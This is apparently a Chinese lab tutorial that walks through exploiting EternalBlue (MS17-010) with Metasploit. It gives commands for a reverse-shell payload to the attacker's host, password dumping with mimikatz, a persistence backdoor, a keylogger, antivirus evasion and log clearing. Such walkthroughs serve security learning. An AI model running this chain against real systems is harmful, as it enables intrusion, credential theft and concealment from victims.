#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为
永恒之蓝漏洞利用
实验环境
客户机(win7 ip:192.168.0.105)
攻击机(kali ip:192.168.0.101)
具体步骤
查看局域网设备
使用netdiscover 查看局域网的设备
![95daba58f7249aac22a599109b32e978.png](https://img-blog.csdnimg.cn/img_convert/95daba58f7249aac22a599109b32e978.png)
如上图所示,搜索到了一台IP为192.168.0.103的设备
使用 nmap 扫描
root@WHOAMI:~# nmap -sS -A -p- -v -O 192.168.0.103
-sS 半开扫描
-A 全面系统检测、启用脚本检测、扫描等
-p- 扫描全部开放的端口
-v 显示扫描过程,
-O 启用远程操作系统检测,存在误报
扫描结果如下图
![fc00bbb44def07e5aa5c7f320da0ac13.png](https://img-blog.csdnimg.cn/img_convert/fc00bbb44def07e5aa5c7f320da0ac13.png)
![82a27477c1d0bbc67480a49b25e15c66.png](https://img-blog.csdnimg.cn/img_convert/82a27477c1d0bbc67480a49b25e15c66.png)
发现目标机器开放的端口还有Windows 7操作系统
对主机进行扫描确认是否存在漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.0.103
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![4873b08791396732deb834bb279dfc5f.png](https://img-blog.csdnimg.cn/img_convert/4873b08791396732deb834bb279dfc5f.png)
上图中出现- Host is likely VULNERABLE to MS17-010!说明客户机存在MS17-010漏洞下面开始漏洞利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.103
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![b18468e39f360b8302deecba2a2aeb73.png](https://img-blog.csdnimg.cn/img_convert/b18468e39f360b8302deecba2a2aeb73.png)
连接成功
![c8aea11f31cb10a56bc43ccc300b3f2e.png](https://img-blog.csdnimg.cn/img_convert/c8aea11f31cb10a56bc43ccc300b3f2e.png)
查看权限
meterpreter > getuid
![6afa5eac2029398b4f96b158672443bb.png](https://img-blog.csdnimg.cn/img_convert/6afa5eac2029398b4f96b158672443bb.png)
查看登录的用户的明文密码
使用命令 run hashdump 加载 hashdump 模块
![e7f8769b661bd6b1c6ea2628e1d0462a.png](https://img-blog.csdnimg.cn/img_convert/e7f8769b661bd6b1c6ea2628e1d0462a.png)
使用命令 load mimikatz 加载 mimikatz 模块,再使用 help mimikatz
![77d2845fd7137369ae42f07028fcf958.png](https://img-blog.csdnimg.cn/img_convert/77d2845fd7137369ae42f07028fcf958.png)
使用 wdigest 命令获取登录过的用户储存在内存里的明文密码
![a7997d460d644a4f39f52e7d6ca0bfa7.png](https://img-blog.csdnimg.cn/img_convert/a7997d460d644a4f39f52e7d6ca0bfa7.png)
查看分区
run post/windows/gather/forensics/enum_drives
![37b1bae3c2e89297008444223deaf31c.png](https://img-blog.csdnimg.cn/img_convert/37b1bae3c2e89297008444223deaf31c.png)
查看补丁信息
![67ff885931383a59cd2cdb0c1ee95843.png](https://img-blog.csdnimg.cn/img_convert/67ff885931383a59cd2cdb0c1ee95843.png)
给 win7 留后门
使用命令 run persistence -X -i 10 -r 192.168.0.101 -p 444
![887f7bdf8d4e085831c9af4f756e4c70.png](https://img-blog.csdnimg.cn/img_convert/887f7bdf8d4e085831c9af4f756e4c70.png)
再开启一个 msf
加载 handler 模块
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.101
msf5 exploit(multi/handler) > set LPORT 444
msf5 exploit(multi/handler) > run
如下图成功在444端口监听到一个会话
![6ebcc241d5c29c20e199d262eb0bfcb2.png](https://img-blog.csdnimg.cn/img_convert/6ebcc241d5c29c20e199d262eb0bfcb2.png)
Metasploit 键盘记录
ps查看进程
![af8acac27d39957894d56874146ed400.png](https://img-blog.csdnimg.cn/img_convert/af8acac27d39957894d56874146ed400.png)
将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀毒软件
![653fc58e3bbb6ba18440358e34f07227.png](https://img-blog.csdnimg.cn/img_convert/653fc58e3bbb6ba18440358e34f07227.png)
最后,我们启动键盘记录器,等待一段时间并转储输出。
![ee659464d6ca66fe9c1f9e9857c11c1c.png](https://img-blog.csdnimg.cn/img_convert/ee659464d6ca66fe9c1f9e9857c11c1c.png)
清除痕迹
在渗透入侵的过程中难免会留下一下日志信息痕迹,我们可以使用此命令来擦除留下的痕迹
使用clearev
![3637e1bf0da3bfd77f1b583c7851bb05.png](https://img-blog.csdnimg.cn/img_convert/3637e1bf0da3bfd77f1b583c7851bb05.png)
解决措施
·及时打补丁
·安装杀毒软件自动更新补丁